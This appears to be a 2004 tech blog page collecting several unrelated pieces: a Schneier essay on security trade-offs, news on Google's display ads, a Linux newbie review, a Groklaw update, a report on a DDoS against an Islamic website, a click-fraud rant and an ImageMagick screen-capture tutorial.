Saturday, May 22, 2004

SEC: We are all security customers

By Bruce Schneier

Story last modified May 4, 2004, 4:00 AM PDT

National security is a hot political topic right now, as both presidential candidates are asking us to decide which one of them is better fit to secure the country.

Many large and expensive government programs--the CAPPS II airline profiling system, the US-VISIT program that fingerprints foreigners entering our country, and the various data-mining programs in research and development--take as a given the need for more security.
At the end of 2005, when many provisions of the controversial Patriot Act expire, we will again be asked to sacrifice certain liberties for security, as many legislators seek to make those provisions permanent.

As a security professional, I see a vital component missing from the debate. It's important to discuss different security measures, and determine which ones will be most effective. But that's only half of the equation; it's just as important to discuss the costs. Security is always a trade-off, and herein lies the real question: "Is this security countermeasure worth it?"

As Americans, and as citizens of the world, we need to think of ourselves as security consumers. Just as a smart consumer looks for the best value for his dollar, we need to do the same. Many of the countermeasures being proposed and implemented cost billions. Others cost in other ways: convenience, privacy, civil liberties, fundamental freedoms, greater danger of other threats. As consumers, we need to get the most security we can for what we spend.

The invasion of Iraq, for example, is presented as an important move for national security. It may be true, but it's only half of the argument. Invading Iraq has cost the United States enormously. The monetary bill is more than $100 billion, and the cost is still rising. The cost in American lives is more than 600, and the number is still rising. The cost in world opinion is considerable. There's a question that needs to be addressed: "Was this the best way to spend all of that? As security consumers, did we get the most security we could have for that $100 billion, those lives, and those other things?"

If it was, then we did the right thing. But if it wasn't, then we made a mistake. Even though a free Iraq is a good thing in the abstract, we would have been smarter spending our money, and lives and good will, in the world elsewhere.

That's the proper analysis, and it's the way everyone thinks when making personal security choices. Even people who say that we must do everything possible to prevent another Sept. 11 don't advocate permanently grounding every aircraft in this country. Even though that would be an effective countermeasure, it's ridiculous. It's not worth it. Giving up commercial aviation is far too large a price to pay for the increase in security that it would buy. Only a foolish security consumer would do something like that.

We need to bring the same analysis to bear when thinking about other security countermeasures. Is the added security from the CAPPS-II airline profiling system worth the billions of dollars it will cost, both in dollars and in the systematic stigmatization of certain classes of Americans? Would we be smarter to spend our money on hiring Arabic translators within the FBI and the CIA, or on emergency response capabilities in our cities and towns?

As security consumers, we get to make this choice. America doesn't have infinite money or freedoms. If we're going to spend them to get security, we should act like smart consumers and get the most security we can.

The efficacy of a security countermeasure is important, but it's never the only consideration. Almost none of the people reading this essay wear bulletproof vests. It's not because they don't work--in fact they do--but because most people don't believe that wearing the vest is worth the cost. It's not worth the money, or the inconvenience, or the lack of style. The risk of being shot is low. As security consumers, we don't believe that a bulletproof vest is a good security trade-off.

Similarly, much of what is being proposed as national security is a bad security trade-off. It's not worth it, and as consumers we're getting ripped off.

Being a smart security consumer is hard, just as being a good citizen is hard. Why? Because both require thoughtful consideration of trade-offs and alternatives. But in this election year, it is vitally important. We need to learn about the issues. We need to turn to experts who are nonpartisan--who are not trying to get elected or stay elected. We need to become informed. Otherwise it's no different than walking into a car dealership without knowing anything about the different models and prices--we're going to get ripped off.

Copyright ©1995-2003 CNET Networks, Inc. All rights reserved.

NEWS: Google's ad plans provoke grumbling

By Stefanie Olsen
Staff Writer, CNET News.com

Story last modified May 17, 2004, 4:00 AM PDT

Google's success in Web advertising is fast becoming bittersweet for other companies that rely on ads to pay the bills.

With the search engine's move last week to sell display advertising across the Web, Google firmly established itself as a major online advertising network and a solicitor to deep-pocketed brand advertisers. That's a meaningful shift as the Mountain View, Calif., company heads for a $2.7 billion initial public offering.

More striking is that Google will broaden its lucrative business model for direct-response ads into the brand-advertising realm, where the money gets even richer. Google's "pay-for-performance" system is built on selling keyword ads to the highest bidder and letting marketers pay only when Web surfers click on tiny text links. That runs in stark contrast to display advertising such as billboardlike banners and tall, vertical "skyscrapers," which publishers sell per thousand, without the promise of a click. (The latter is called cost per impression, or CPM advertising, and is akin to television or print ads.)


What's new:
Google will broaden its lucrative business model for direct-response ads into the brand-advertising realm.

Bottom line:
Under Google's new plan, its publishing partners would get paid for display ads only when users click, which has irked other online ad networks specializing in display ads.

More stories on this topic
If Google's system blossoms, its publishing partners would get paid for display ads only when users click, even if they carry branding value. That has irked other online ad networks specializing in display ads, which have spent the Net's boom and bust years trying to prove that online ads are vital for influencing brand loyalty.

"Google's making a public statement that the only value of a banner is when it's clicked upon, and it flies in the face of all the research done in the last five years that demonstrates the impact a banner can have on brand awareness and purchase intent," said Dave Moore, CEO of 24/7 Real Media, a New York-based company that sells advertising for 800 sites worldwide.

"Why shouldn't I get paid for creating the step to the ultimate purchase?" Moore said.

Ultimately, publishers will make the decision about whether to adopt Google's service, and at least one major Web site has said "No."

Yet Google's move carries tremendous weight because the company has become the poster child for the second coming of the Web. With annual revenue of nearly a billion dollars, it plans to raise $2.7 billion in the largest public offering since the Internet's heyday. Its search marketing programs have helped overall online advertising prosper again and are fueling its fastest-growing sector.

Sales from U.S. search engine marketing will reach $2.1 billion this year, up from $1.6 billion last year, according to Jupiter Research. By 2008, sales are expected to hit $4.3 billion.

Pressure to grow revenue
As Google seeks Wall Street's approval, it will be under increasing pressure to show new revenue streams and growth margins. Already, it has reversed its long-held antipathy for banner ads by saying it will hawk them for publishers. Yet many advertising executives say that Google's broadening of its search engine ad network into display advertising is the only logical step in its pursuit of branding budgets, which amount to $60 billion annually for TV alone.

"Google's future revenue growth could depend on attracting major brand advertisers, because that's where the money is," said Nick Nynan, CEO of Dynamic Logic, a brand measurement company.

In offering the image ad service, Google is responding to requests from advertisers, according to Salar Kamangar, the company's product development director. To ensure publishers and advertisers get their money's worth, Google will only run graphical ads that generate enough clicks to compensate for those from two to four tiny text ads, depending on the size of the graphic. Otherwise they'll be replaced. He added that advertisers will naturally bid a higher amount for certain keywords carrying brand value.

For now, Google has no plans to offer CPM pricing.

"Our advertisers are focused on direct response. But brand advertisers are still driving toward more clicks and more sales," Kamangar said. "We don't think this product will preclude other types of branding. This is really an added level of flexibility and value."

Google started out as a search engine and eventually followed the lead of rival Overture Services into auction-style ads that appear as tiny links on the margins of search-results pages. It later syndicated that service to outside search providers, and then, to publishers.

Specifically, Google last year introduced its AdSense service to let publishers display text ads next to content on their sites. Google's technology analyzes a publisher's page to figure out the best set of keywords to match its meaning. Then keyword-related ads are placed on the page in real time.

Going forward, Google will let advertisers attach an image to those campaigns, in four sizes. AdSense publishers can choose to run those ads in lieu of the text ads.

For some, that leap is a no-brainer.

"Search has proved that advertising on the Internet works," said Greg Stuart, CEO of the Interactive Advertising Bureau. "The media doesn't set the objective--the marketer does."

Yet for critics, it fosters concern that Google is growing too fast, without thought for the health of Internet advertising.

Search-related ads have often been equated to Yellow Pages advertising, or direct marketing in which marketers pay $5 in the hopes of making $7 after reaching the right audience in a buying mood. Brand advertising is fundamentally different. Marketers spend billions to reach the masses and leave an ephemeral impression via TV, billboards and print.

Proving ads' viability
Banner ads were introduced in the mid-1990s as the Internet's response to offline advertising. But because the Net is inherently trackable, advertisers slowly watched their rates of response to banners decline to less than 1 percent of every thousand. That called into question the viability of Web ads altogether.

As a result, Internet publishers have invested significantly in research to prove that the Web is viable for branding, too. For example, a cross-media optimization study released by the Interactive Advertising Bureau in May showed that 6 percent of sales of Ford Motor's F-150 pickup truck introduced late 2003 were the direct result of online ads that didn't receive click-throughs. Click-on ads attributed to sales above and beyond the 6 percent.

Web advertising has turned around, with expected revenue this year of $8.4 billion, up 15 percent from last year, according to research firm eMarketer. That figure will also top sales of $8.1 billion in 2000, when the Internet ad market was at its height.

Still, one legacy of the Internet bust is the popularity of accountable advertising like cost-per-click search campaigns. In the fourth quarter of 2003, Web advertisers devoted 41 percent of their budgets to performance deals that delivered a click or a customer, according to the Interactive Advertising Bureau. That's up sharply from 26 percent in the same period of 2002. CPM deals accounted for 40 percent of last year's fourth quarter, down from 46 percent in 2002.

Google is hardly the first company to attempt cost-per-click banners, but it is certainly the largest. ValueClick is a publicly traded ad network that began by selling display ads by this measure, and it has slowly adapted to publisher demands by selling display ads by the impression. Performance display ads can range in price from 10 cents to 70 cents per click. CPM-based ads can range in price from $2 to $50 per thousand, depending on the targeting and visibility of a page, ad executives say.

Impression-based advertising makes up the lion's share of ValueClick's business today, thanks to advertisers' willingness to pay for exposure on "decent properties," said John Ardis, ValueClick's vice president of corporate strategy. "Paying by clicks goes against the branding theme and puts pressure on publishers."

Still, he added, "It's one method of marketing. It's not the be all and end all."

For big publishers like The New York Times on the Web, a Google AdSense partner, the image service is not an option. Jason Krebs, vice president of sales and marketing NYTimes.com, said that he likes the delineation between tiny text ads on the publishers' site and large graphical ads it sells to Fortune 500 customers.

"We don't need our pages displayed a la Nascar, with logos all over the place," Krebs said. NYTimes.com sells ads only on a CPM basis, he added.

Some ad executives speculate that Google has seen click-through rates for text ads fall over time, much like banners have in the past. That's why it has turned to flashier graphics as a way to appease marketers.

But it could run into conflicts of interests with publishing partners. For example, a publisher may have sold a display ad campaign to Ford, allowing its ads to appear exclusively on auto-related pages. But an AdSense publisher may also display General Motors' banners on those pages because of Google's automated keyword-matching system, thereby jeopardizing its relationship with Ford.

Google said that to avoid this situation, publishers can block images or specific Web addresses of advertisers.

Some advertising executives say that there's opportunity for both systems of payment and various ad types.

"Direct marketing will always pay on cost-per-click basis. Brand advertisers will be more comfortable with cost per impression," said Chris Saridakis, COO of Pointroll, a technology company that specializes in rich-media display ads.

"The Overtures and Googles have to figure out how to translate the dollars from display ads into these paid listings, and these brand advertisers aren't going to settle for text-based ads," Saridakis said.

* Related News Google to sell banner ads May 12, 2004

* Google files for unusual $2.7 billion IPO April 29, 2004

* Digital ads tune in April 29, 2004

* Get this story's "Big Picture"

Copyright ©1995-2003 CNET Networks, Inc. All rights reserved.

FREE: Windows Mobile Developer Resource Kit

The Windows Mobile Developer Resource Kit is essential for developers seeking knowledge about the latest platform advances for mobile technologies.
For new developers

This resource kit includes a wizard to help you choose the tools and SDKs you need to write your application, guidance on programs that help take your application to market and more technical documentation to help as your skills develop.
For current Windows Mobile developers

This resource kit contains all the new SDKs for Windows Mobile 2003, emulator images and content for developing Windows Mobile 2003 Second Edition applications. New articles on developing applications which are orientation and resolution aware so your applications can take advantage of the capabilities in the new enabled devices.

The Resource Kit DVD includes:

* 20 new technical articles
* 20 new case studies
* eMbedded Visual C++ 3.0
* eMbedded Visual C++ 4.0
* eMbedded Visual C++ 4.0 SP3
* Developer Resources for Windows Mobile 2003 Second Edition
* Pocket PC 2002 SDK
* Pocket PC 2003 SDK
* Pocket PC 2003 Second Edition Emulators
* Smartphone 2002 SDK
* Smartphone 2003 SDK
* Smartphone 2003 Second Edition Emulators
* Compact Framework 1.0 SP2 Redistributable
* Developer Power Toys

International shipments

Orders shipped outside the United States may be subject to import duties and taxes. These items would be levied once the shipment reaches your country/region. Any additional charges for customs clearance will also be the responsibility of those placing/receiving the order. These charges are not determined within this ordering process, and are not estimated in any way through this ordering procedure. Please be aware that when ordering from this site, you are considered the importer of record and must comply with all laws and regulations of the country/region in which you are receiving the goods. Customs policies vary widely depending on each region and country. Should you have any questions please contact your local customs office for further information.
Order the Windows Mobile Developer Resource Kit

ARTICLE: A Windows Vetern's Assessment of Linux

In other posts to this group, I have seen what others view as propoganda
from the Windows camp to dissuade users from trying Linux. This has
prompted me to give my honest assessment. I am a so-called (3-month old)
newbie, having just installed my MDK10 on a home-built state of the art
machine, which includes an Athlon XP 3200+ on the nForce2 chipset (A7N8X).

Some points, good and bad:

1. OpenOffice is great. It has excellent compatibility with MSOffice. Unless
you do extensive formatting and/or programming (I do both), there really is
NO ISSUE. Fonts can be tough in OpenOffice. This needs work.

2. Multimedia - The ALSA rocks. My Audigy is not running on all cylinders
but a audiophile purist would nod approvingly at the 2.1 clean sound--free
from the overly processed crap intoduced by WMA and even iTunes for that
matter. This ogg format sounds better than WMA and is smaller. Bottom line.

3. Digital Video - Personlly...stick with MAC for now. MDK is shakey (at
best) and Windows gives you just enough functionality to drive you
absolutely mad trying to get it all working right.

4. Networking. With some simple tweaks, you can access local windows drives,
share files, printers, etc. With the assistance of Samba, networking and
sharing resources is very simple. Yes, it takes a bit of time to get it
looking like Windows, but it is simple to do if you want to emulate the XP
desktop look and feel. My view is that MDK should work on a feature that
does just that, looks for local nets, sets up a simple Samba profile
automatically and even drops a stupid My Windows Documents icon on the
desktop. Put KMail on there and even a Konqueror icon. Implement the
Redmond look and feel theme. It can be easily done and the rewards would be
immeasurable to newbies.

5. Desktop - KDE is all I use and know. Not only is it more configurable and
faster that XP, it is damn pretty to boot. I love the power KDE gives me
over my system. Spend just one evening with look and feel settings..it is a
blast to tweak. In my opinion....is there hope for me???? hehe

6. Software - Overall, I would make a sweeping generalization that KOffice,
and the like are about two generations behind Microsoft. But man are they
impressive. KMail and the other packages are very sharp and you have to go
out of your way to get confused with them. And the community of folks
building and refining new stuff reinvigorates this old, jaded Windows user.
And let me just say, that I am a mature .NET developer talking here (If
there is such a thing!!!). I am really looking hard at the mono project.

The above is fact, not propoganda. Linux has a ways to go to refine the
power it already has. In programmers parlance, the interface needs to be
refined and encapsulated for Windows average users. If that means pretty
dialogs then so be it. The underlying command line and power is still there.

Personally, I think Linux is fantastic. I admire the developers and those
who support their effort. If you have trouble with MDK10 and you are a home
user, get Lindows. If you are a corporate user, get Suse or Xandros. That's
my opinion of course, but these are all great distros, certainly at the top
of the class.

Think back to the anguish and pain of Dos 4 and Win 3.0. If MDK10 is any
indicator of the future of Linux, I'd have to say it is off to a massively
impressive start!

Houston, TX

NEWS: UNIX Timeline Project -- Grokline's Status

Friday, May 21 2004 @ 11:11 AM EDT
No doubt you are wondering about what happened to the promised launch of the UNIX timeline project. Here is what happened. First, it will go live, probably on Monday, but not here on Groklaw. We will link from here to the timeline site, www.grokline.net. It's not there yet, so don't go there until Monday.
This is such a huge and complex project that MathFox needed to design software to do what we needed doing. It isn't something Geeklog can handle on Groklaw, and so I asked OSRM to host it, in part because I want the project on a server we don't share and have complete control over, and they have kindly agreed to do so, although our work is ours and will be released under a Creative Commons license for the world to enjoy and use. I also thought of some last-minute questions I wanted to ask a patent attorney prior to launch, so we can do our planning as effectively as possible.
This week, we also thought of some ways to make retrieving the information we collect a little easier, with a finer granularity, and that is what is being worked on now. John Crowley, who is doing the design work, came up with some usability improvements, which we also want to implement before we launch.
I noted in the news recently that Microsoft hired a patent attorney away from IBM, and I doubt they did that without a purpose. I am trying to figure out how best to design Grokline so as to block that purpose, as best we can. I, like you, believe that the SCO attack is just the first shot across the bow, and that patents will be the next weapon, perhaps using some other SCO-like proxy. Here's an article that relates to what I am thinking might just be one part of the general plan, ironically enough on MSNBC. I believe Grokline can help in that battle, much in the way Groklaw has helped and will continue to help in the first.
So the plan now is to launch version 0.1 of Grokline, so to speak, on Monday, and then ask you for your input and any ideas for any improvements. I am very conscious that no one is as smart as all of us together, so I look forward to your input. We'll continue tweaking, as needed. If any of you are data architects, I'd like to hear from you.
You might find PCPro's article on IBM's latest filings pertinent to this discussion:
"Indeed Greg Aharonian, who runs Patnews and the www.patenting-art.com site thinks that copyrights in software are a non-starter in the first place. 'Software copyright is so illogical that it affords little to no protection for software, if you understand the law... Software is too much functionality, utility, processes, methods [and] ideas, all governing aspects of software explicitly denied copyright protection.'"
There is a link to a paper by Mr. Aharonian, with a handy list of cases on copyright. Obviously, the SCO case is an attempt to broaden the definition of what copyright can protect in software, not only in the IBM case but most particularly in the AutoZone lawsuit, but the real battle, in my opinion, since I expect them to lose the copyright battle, will be patents. The Anderer memo showed us that SCO is likely just a stand-in for those who wish to block GNU/Linux. We have seen that there are those willing to misuse the courts as an anticompetitive weapon. The ADTI book demonstrates that the dark side is willing to unfairly smear the reputation of an honorable man. Andy Tanenbaum contacted me to let me know that there is an update on his web site, in which he provides even more clarity to his position and states plainly once again that Linus did write Linux. Also, he heard from Linus, and Mr. Brown never even contacted Linus in connection with this book. Can you imagine?
"In his email, Linus said that Brown never contacted him. No email, no phone call, no personal interview. Nothing. Considering the fact that Brown was writing an explosive book in which he accused Linus of not being the author of Linux, you would think a serious author would at least confront the subject with the accusation and give him a chance to respond. What kind of a reporter talks to people on the periphery of the subject but fails to talk to the main player?"
I also wanted to share with you a new search engine, or new to me anyway, that searches just for scientific information on the Internet. It's called Scirus, and when I searched for patents, here is what it found. Enjoy. And there is an article on the ADTI mess on IT Business that sums up like this:
"Prentice Hall could use the Tocqueville Institution report as the basis for a lawsuit, but not if it has been watching SCO, whose courtroom antics recently earned it a place in Business 2.0's 'What Doesn't Work' section. What these scandals do, in the long term, is create a culture of fear that could leave the next generation of innovators too paralyzed to develop their ideas. If we are truly living within what the report's author depressingly calls an 'intellectual property economy,' we better start distinguishing what constitutes creativity and what's a rip-off. No, Linux did not come fully-formed out of some vaccuum, but by using this feeble strategy to undermine him, Torvald's critics are stealing from the best."
So, if this is the opponent and these are their methods, and if patents are next, then that is what we need to begin thinking about, and I am.

NEWS: France: Hackers silence a leading Islamic website

The Islamic website Oumma.com was wiped off the Internet for over ten days following an attack by hackers, announced its chief editor Said Branine.
The website posted on its forum an anti-Semitic fatwa, a religious writ, allegedly from the Al Azar University of Muslim theology in Cairo, sent in by a "Muslim web surfer". The fatwa listed the "twenty fundamental faults" of the Jews as enumerated in the Koran. The forum is moderated after the texts are posted, explained Branine, and the incriminated message was erased only four hours after it was put on line.
In remained however on the Islamic website long enough to be spotted by a French reporter with the weekly newsmagazine Marianne. She wrote an article wondering whether the posting of such material was consistent with the site's declared goal of "promoting dialogue between religions".
Hours before Marianne was even printed, Oumma.com went under the fire of an unprecedented attack of hackers, said Branine. Millions of requests were sent out to the Oumma server, triggering the well-known "Denial of service" answer. "We tried to switch service providers, but the hackers were really too strong," said Branine. "Our site is bothering lots of people because of our freedom of speech," went on the site's editor who was very careful not to incriminate anyone for the wrongdoing.
Friday, following a report on the hackers' attack in the leftist daily Liberation, the site was reachable again.
Oumma.com was created in 1999. It boasts a membership of 120,000 web surfers and over 10 million hits per month. A constant propaganda tool against Israel in general and its "bete noire" Ariel Sharon in particular, Oumma.com is the mouthpiece of Tariq Ramadan, an Islamic new wave extremist theologian and a proven anti-Semite. Ramadan, grandson of Hassan al Banna, the founder of the Islamic Brotherhood, is the darling of the French-speaking left and the guru of the young Muslim generation. Soft spoken, good-looking and neatly dressed, Ramadan is being used by the Leftists as a gateway to the otherwise non-politicized Muslim youths.
He outraged some French intellectuals when he wrote on Oumma.com that when it comes to the Middle-East conflict, French philosophers are driven by their community affiliation rather than by their brains. All the listed writers were supposed to be Jews. One was not. Pierre-Andr Taguieff, the non-Jew, wrote back that in Ramadan's mind, one had to be Jewish to support Israel.
French law forbids to list people according to their religion or race or creed. Ramadan was accordingly sued by anti-racist organizations.
The self-promoted modern Ramadan was also caught off base when it was revealed that he refused to condemn the stoning of adulterous women. In his latest book, he pronounced himself for a "moratorium" on the issue.

ARTICLE: India's Secret Army of Ad Clickers - Rupees for Clicks

Posted: Fri May 21, 2004 12:14 pm Post subject: India's Secret Army of Ad Clickers - Rupees for Clicks
Tee hee... I hate to say ' I told you so... " ... but... well... I told you so...

Since the introduction of Google Ads and various other 'pay for click' advertising schemes, I have been saying that it was open to abuse and that advertisers that 'pay for clicks' are probably 'paying to support some family in India and not attracting real clients or potential customers...'.

Here is a nice little story out of The Times of India that helps explain why advertisers are getting RIPPED OFF by these ' pay for click schemes '.


India's Secret Army of Ad Clickers
The Times Of India:

With her baby on her lap, Maya Sharma (name changed) gets down to work every evening from her eighth-floor flat at Vasant Vihar. Maya's job is to click on online advertisements. She doesn't care about the ads, but diligently keeps count — it's $0.18 to $0.25 per click.

A growing number of housewives, college graduates, and even working professionals across metropolitan cities are rushing to click paid Internet ads to make $100 to $200 (up to Rs 9,000) per month.

"It's boring, but it is extra money for a couple of hours of clicking weblinks every day," says a resident of Delhi's Patparganj, who has kept a $300-target for the summer.

Traffic to click overseas Internet ads — from home loans to insurance — is spreading fast in India. "I have no interest in what appears when clicking an ad. I care only whether to pause 60 seconds or 90 seconds, as money is credited if you stay online for a fixed time," says another user.

Here's how it works: online advertisers in developed markets agree to pay hosting website each time an ad is clicked. With performance-based deals becoming dominant on the Internet, intermediaries have sprung up to "do the needful”.' Why, type in 'earn rupees clicking ads' in Google — you get 25,000 results.

If you advertise online, with Google Adwords or similar programs, be aware that scammy bizops like this may be driving your costs up

The reason I find this worth noting is that these 'pay for click' scams are hurting web sites that depend on regular channels of advertising.

Advertisers have been impressed by the high number of CLICKS they get when they post a banner ad through Google Ads. They compare the clicks they get for regular banner ads against the number of 'CLICK THROUGHS' they get with these 'pay for clicks' and the statistics show that 'pay for clicks' get more clicks.

Oddly enough no one has really taken the time to do two things :

a) compare how many of those 'pay for clicks' actually lead to closings or tangible sales...
b) take note of where all these 'pay for clicks' are originating from... After all, 2 million 'click throughs' that trace back to some slum in India is not exactly the focused or targeted market that the advertiser was hoping and paying to get their advertisement in front of.

Eventually the advertisers whose limited budgets are being syphoned off will do a Return on Investment study and figure out that they spent a lot of money and got nothing more in return then a huge traffic flow from countries where the average monthly household income is about $100 per month or less...

But as I noted... unfortunately these ' pay for click ' schemes of Google and others are bleeding limited advertising budgets from companies, while depriving legitimate advertising channels of potential revenues.

Now I wonder why the advertising companies are so quick to support and embellish these 'pay for click' scams. Possibly they have no idea about the level of subversion and misrepresentation their click through stats represent. Or possibly the advertising agencies are simply lazy and take the pay for click route in order to generate higher number of 'apparent' click throughs to their clients.

But in the end this magical bubble is going to burst.... and I would suggest that these ' pay for clicks ' will bring about the next collapse of Internet advertising.

The original Internet advertising broke and brought on the initial collapse of Internet advertsing when advertising firms placed banner ads without any focus on the intended targets or market for the product or service they were promoting.

My personal favorite example being the Oracle banner ads that were placed in the Yahoo Personal Dating area. I have never heard a reasonable explanation who Oracle ( or Oracles advertising agency ) thought they were going to sell a $100,000 database product to in an area inhabited by singles hoping to score a date...

Sadly a lot of security related web sites have fallen into the trap of believing that these 'pay for click' banner ads are their salvation to reaping some revenue to support their sites. In most cases these web sites are operating honestly and simply cross their fingers that enough of their legitimate users will click on the ads to generate some cash flow for their sites.

On the other hand, there are some 'scam' web sites, yes even in the Security scene, that are participating in these 'pay for click' schemes and are forcing clicks or creating armies of 'paid clickers' to click on these pay for click banners. After all... the web site can afford to split the profits they generate from these bogus clicks with their accomplices.

As I was looking around Google about more information on this topic, I came across this interesting discussion that appeared elsewhere.

So I can take some pleasure that I am not alone in the woods wondering about these pay for ad clicks...


This article is yet another one in the A-billion-plus-Indians-are-gonna-destroy-you genre that we’ve been seeing in recent times.

Not only is the reporter, N.Vidyasagar, trying to impart an India flavour to a topic(fraudulent banner/ad clicking) that has been around for almost as long as banner ads have been around, he is also guilty of giving false information to make his case appear stronger.

As proof of the Indian PPC racket Vidyasagar offers as proof the 25,000+ results on Google for the search phrase “earn rupees clicking ads”. I did run the query…and all I got was around 3,200+ results.

But if you do search for “earn dollars clicking ads”, the results are surprise, surprise…25,900!

I don’t expect much of integrity or objectivity from the Slimes publications, but is it too much to expect them to not fudge commonly available figures?!?

Posted by Jivha at May 4, 2004 01:47 AM | TrackBack

Oh! Further to what I mentioned below, Google only shows 20 of those 153 results, many of them being postings like these which question N.Vidyasagar's article.

Posted by: Premnath Kudva at May 10, 2004 04:34 PM | Permalink

Actually if you run that search in Google for the search phrase “earn rupees clicking ads” within quotes you will only get 153 results. Wonder how N.Vidyasagar got that 25,000 from.

Posted by: Premnath Kudva at May 10, 2004 04:31 PM | Permalink

I want to join you.

Posted by: Deepti aggarwal at May 8, 2004 07:06 PM | Permalink

TOI should come out with much better & sensible article.

Posted by: raghuram at May 5, 2004 06:55 PM | Permalink

The google search you did is neat. It's really not that hard to capture the IP of the box (or atleast the subnet address) from which click-throughs happen. In fact, I am quite sure it is done (I didn't check). I would (and know I can) do it if I count click throughs to pay dollars. That would pretty much eliminate any click-throughs that are geographically irrelevant. In fact, in the article, it says, "Clicks are bought to boost number of hits for web ads or online advertisers who are not tracking user location".

There may be some truth in the article. But, any decent online ad server can and will track user locations.

good day.

I found that the use of GOOGLE SEARCH to find all the scammers seeking to cheat Google Ads ( and similar Pay For Click companies ) to be kind of amusing and ironic...

It's odd that Google doesn't do anything to block out solicitations to conspire against Google 'Pay for Click' advertisers. But then again Google makes money everytime some housewife in India, or Pakistan, or Russia or Brazil clicks on one of their ads... And every bogus click helps bolster Googles stats on 'how effective' Google Clicks are for advertisers.

I know that Google takes the 'scammers' seriously and will attempt to ferret out the blatantly OBVIOUS ones... but they probably are only able to spot the .01% that are so stupidly obvious that they are literally begging to be caught...

I can't wait for the bubble to burst... as the burned advertisers retreat and start looking for more honest methods of bringing their products and services to the attention of potential customers.

Unfortunately in the meantime a good number of legitimate web sites will financially collapse waiting for the advertisers to wake up... A quick look around the security scene will show a number of quite respectable and well known web sites that are not generating any advertising revenue at all. Some of those web sites may not be with us by the Fall of 2004...

And the only sites that will be left to pick up the pieces will be the ones that were scamming the advertisers and falsely generating revenue through bogus clicks.

After all... in countries where the average monthly income is a few hundred dollars per month... you can see how the popularity of bogus ad clickers is growing expotentially.

But as the one chap wrote... the scammers who find ways to cheat the various 'pay for click' advertising schemes have existed from the start of the Internet and they will probably continue to exist years from now...

Well... that is my rant for today ahhahaha....

And as you surf the various web sites, not only the security ones, you can think of this little rant about those ' Google Ads ' that may appear in front of you. Give em a click... as the ones on the Security web sites are most likely not cheating and not getting paid for hosting those ads... It will drop a few coins into their pockets and it can't be any worst then some housewife in India doing it

Maybe this topic would be more openly discussed and investigated if they ever found out that the Al Qaeda were the ones profiting and behind the bogus 'pay for click' operations...

And oddly enough... SPAM gets all the real attention, because it clogs up people's email boxes... and yet seldom do people ever do stats that show how many of those SPAM's are somehow tied into some twirps efforts to force 'click throughs' to a specific web site to garner 'click through pay' for the spammer. Or in other cases, trojans are deployed on victim computers in order to generate a zombie army of 'click through' machines that can be commanded which links to click in order to generate pocket cash for some zombie master. Or worst yet... the number of web site operators that deploy various tricks on their web sites to trick people into clicking these 'pay for click' links.

Ah the seedy underbelly of the Internet... yah gotta love it...

Tee hee...

ARTICLE: Making Screen-Capture Movies

If a picture is worth a thousand words, then how about a thousand pictures
-- or a graphical animation? Getting the message across depends a lot on
the tools at hand. It's one thing to stand in front of a classroom with a
blackboard, a projector, and a room full of PCs, but it's quite another thing describing a set of ideas to multiple people who are standing in front of a
kiosk, in a hall filled with competing noises and distractions. Wouldn't it be
great to create animated screen shots without first taking a course in
multimedia and purchasing expensive development applications? Of course it

The Screen-Shot Movie

Let's set the stage: our objective is to create a screen-shot movie that
demonstrates how to use a certain feature in an application. In addition, we
should be able to provide commentary within the movie to give background as to
what's going on.
Ideally, we can make a movie with tools that don't take long to learn and
use. The technique demonstrated in this article shows how to capture screen
shots in rapid succession. These screen shots are then converted into a single
file that can be read by nothing more complicated than a browser.

The Tools

We need the following tools:

  • The ImageMagick command-line utilities, to create, edit, and convert images from one format to another.

  • xwininfo, the window information utility for X.

  • A small bash script to record multiple screen captures.

How to Use the Tools

Launch the application you want to record. Use xwininfo to
obtain the target window's hexadecimal ID number. In this example, the ID
number, 0x140001d, comes from the fifth line in the output
bernier@wolf:~/tmp/animate$ xwininfo

xwininfo: Please select the window about which you
would like information by clicking the
mouse in that window.
xwininfo: Window id: 0x140001d "making movies.sxw - OpenOffice.org 1.1.0 "
Absolute upper-left X: 4
Absolute upper-left Y: 18
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 920
Height: 630
Depth: 16
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x1400001 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: StaticGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +4+18 -100+18 -100-120 +4-120
-geometry 920x630+4+18

Use the import command to capture the window. If this succeeds,
you'll hear two beeps from the PC's speaker. If you want a frame around the
screen capture, add the -frame switch. By the way, the import
command can capture screens to any file format, but the MIFF format is very
import -window 0x140001d openoffice.miff

View the screen capture with display:
display openoffice.miff

If you prefer a different format, use convert to, well, convert
the image:
convert openoffice.miff openoffice.png

With all of those steps explained, here's a simple bash script to collect the screen captures for our movie. It takes two command-line arguments: the window ID and
the amount of shots to capture:

# A simple bash script to screen capture
# Supply two arguments, the window id and number of captures
let x=1
# loop until it has captured the number of captures requested
while [ "$x" -le "$2" ]
import -window $1 "capture$x.miff"
# uncomment the line below
# if you want more time in between screen captures
# sleep 2s
let x+=1

Invoking the script is straightforward. Make it executable, then
./capture.sh w_id no_capt

where w_id is the hexadecimal ID obtained from
xwininfo, and no_capt is the number of screen shots to
Use animate to animate the captured images:
animate -delay 20 *.miff

The delay number controls how much time to wait between the
individual screen captures. The units are in hundredths of a second.
Finally, converting the animated images to a more
convenient, single-file format is accomplished by using the convert utility.
There are several likely formats:
  • MNG is a license free, multi-image file format, similar to PNG but
    with more bells and whistles. This format is not yet widely used, but it is very
    neat and there are plug-ins for all the major browsers.
    convert -delay 20 *.miff capture.mng

  • GIF, you should know.
    convert -delay 20 *.miff capture.gif

  • MPEG encoding requires you to download and compile the mpeg2encode
    utility source code
    , but it does allow you to add sound.
    convert -delay 20 *.miff capture.mpg

Enhancing a Screen Capture

It's not always enough to replicate a series of keystrokes and pop-up
menus. Sometimes, you need details that help explain what's going on better.
For that matter, it's nice to make a plain screen look fantastic with all sorts
of graphical, special effects. That's where mogrify comes in.
mogrify -fill blue -pointsize 25 -draw 'text 10,20 "Hello World" '


The above command adds the phrase "Hello World" to the
capture1.miff image. The words will be colored blue, with a
point size of 25. The words are placed relative to the top left corner of the
image in terms of x (10 pixels to the right) and y (20 pixels down)
The montage command makes the additions on a copy of the
original. Remember to use the -geometry switch with the current
window size (for example, -geometry 920x630); otherwise, the copy
will have a size of 120 by 120 pixels.
montage -fill black -pointsize 50 	-draw 'text 100,300 "Robert Bernier" ' 	-geometry 920x630 capture1.miff capture1a.miff

Drawing a box behind the words will make them stand out:
